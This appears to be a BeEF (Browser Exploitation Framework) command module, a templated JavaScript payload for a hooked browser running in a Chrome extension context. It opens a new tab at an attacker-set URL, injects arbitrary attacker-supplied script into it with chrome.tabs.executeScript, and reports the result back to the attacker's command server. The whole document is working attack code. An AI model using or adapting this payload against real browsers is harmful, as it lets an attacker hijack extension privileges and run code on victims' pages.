beef.execute(function() {
try{
chrome.tabs.create({url:"<%= @url %>"}, function(tab){
chrome.tabs.executeScript(tab.id,{code:"<%= @theJS %>"}, function(){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Code executed on tab.id: ' + tab.id);
});
});
} catch(error){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Not inside of a Chrome Extension');
}
});